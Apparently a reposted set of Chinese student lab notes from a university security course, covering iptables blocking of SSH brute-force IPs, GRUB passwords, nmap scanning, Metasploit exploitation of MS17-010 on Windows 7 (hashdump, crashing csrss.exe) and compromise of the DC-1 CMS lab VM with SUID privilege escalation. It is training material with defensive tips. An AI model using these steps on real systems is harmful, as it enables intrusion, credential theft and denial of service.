当前位置:   article > 正文

太原理工大学软件学院信息安全课程设计DAY3_信息安全课程设计csdn

信息安全课程设计csdn
实验 1 :通过分析日志找到暴力破解的 ip 地址,将其加入防火墙拒绝规则
日志分析登陆数据库
/var/log/secure 找到暴力破解的 ip 地址将其加入系统防火墙
拿Linux举例:
在Linux命令行查询日志

暴力破解过程会被记录;

进入secure

cat secure 查找failed password

查找关键字 grep "Failed Password" secure

统计命令数量 grep "Failed Password" secure | wc -l

得到测试数量

 我将192.168.136.135写入防火墙中就可以拒绝访问。

iptables -nvL

 input规则要过滤,在input里面插入规则;

ssh 连接用什么协议? tcp 对于 kali 来说 22 属于 目标端口 22 源地址是 192.168.136.135
iptables -nvL 查看
iptables -I INPUT -p tcp --dport 22 -s 192.168.136.135 -j REJECT
iptables -F INPUT   清除规则

 Windows原理相通。

Linux 单用户破解密码 怎么防御?
grub 菜单什么时候能见到
1 、重启的时候能见到
2 、防备身边人应该 对 grub 菜单加个密码
3 、如果要修改 grub 菜单内容必须输入正确密码
实验 2 :为 grub 引导菜单加密码防止修改 root 密码

 

 vim grub.cfg

找到

 要配密码就在这个里面配,其他地方会全部重置。

grub引导菜单位置 /boot/grub2/grub.cfg

该文件不能直接编辑 他的配置脚本位置  

找到这个

建议修改以下脚本后才可以成功

 找到/etc/grub.d

改10_Linux

指令:vim 10_Linux

再进入

 密码产生

编辑脚本文件10_linux

 生成配置文件:

重新生成配置文件:

 生成的配置信息里面哪里存放了刚刚修改过的信息?

 

 编写在这里了;

重新验证

 

 按e进入修改,提示要输入账户名和密码

nmap 扫描器 存活主机 以及 开发端口的 配合扫描脚本完成批量扫描甚至漏洞特征扫描等等

实验3win7的永恒之蓝漏洞利用

(关闭win7防火墙)

nmap -sP 192.168.xxx.0/24  ping测试

 

提升扫描能力 sudo nmap -sP 192.168.xxx.0/24

(最下面的那个没有Mac地址,因为那是本机)

 打开win7防火墙;

kali不能pingwin7

 但是win7可以ping kali

nmap用root账户有很牛的功能,所有的都可以扫描出来

普通版

 root版

nmap 做内网主机存活测试 -sP ping扫描

sudo nmap -sP 192.168.xx.0/24 扫描网段
windows 的防火墙关闭的状态下完成 445 端口 SMB 服务消息块(文件系统共享)
要关闭防火墙

 

 

 sudo nmap -sT 192.168.136.129 //要加sudo

防火墙没有关闭。

 关了;

MS17-010 漏洞编号 

2017年才被发现的漏洞

kali 启动 msf 渗透测试脚本应用平台 
sudo msfdb run
msf6> search ms17-010
msf6>help
查找search
msf6>search ms17-010

 1 4使用的较多

扫描1

 调整配置:

set rhosts 192.168.136.0/24

set threads 50
暴露了永恒之蓝漏洞

 攻击脚本

 

切换

配置 

配置rhost 

 run

 永恒之蓝漏洞利用

 重新输入

 成功

 meterpreter>help

可以查看功能

 

 键入指令可以实现不同的功能

**shell

 确定我是谁:whoami

 这是system超级账户,使用windows的命令行

hashdump:从sam文件中读出的 

利用pkill杀进程,使它蓝屏

 shell 调用对方的cms

screenshot 截屏
hashdump 读取 sam 文件
pkill csrss.exe 蓝屏攻击
防护 升级 打补丁 开防火墙 关闭server服务
关闭server服务

 

cms 平台 内容管理系统 网站 bbs 论坛 贴吧 管理员删帖 后台管理页面 删除的实际是数据库的数据。
html 页面通过表单提交的变量 被 php 获取到后 由 php 连接数据库 删除数据库的数据

 

实验 4 cms 网站的 web 漏洞利用

 

解压dc-1.ova包,通过虚拟机软件打开 并且设定dc-1NAT网络模式后开机  

kali:

 140为靶机DC-1

不回应ack   syn半联结

sudo nmap -sS 目标 ip syn 半联结扫描
sudo nmap -A -p 1-200 192.168.136.140 A 表示多种功能更包括显示详细信息和端口对应服务版本信息等

 

通过 msf 寻找对应 cms 平台的漏洞  

 攻击靶机

 设置靶机IP地址

 www-data是普通用户,权限低

得到对方主机shell 

 如何提权?

立用 python 构建 tty 终端
python -c 'import pty;pty.spawn("/bin/bash")'
find / -perm +4000 -type f 2>/dev/null 找出所有具有 suid 的命令字
find flag1.txt -exec '/bin/sh' \; 立用 suid 命令 提权为管理员
cms 平台漏洞修复:改源码 或者等官方升级

 

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/小桥流水78/article/detail/750021
推荐阅读
相关标签
  

闽ICP备14008679号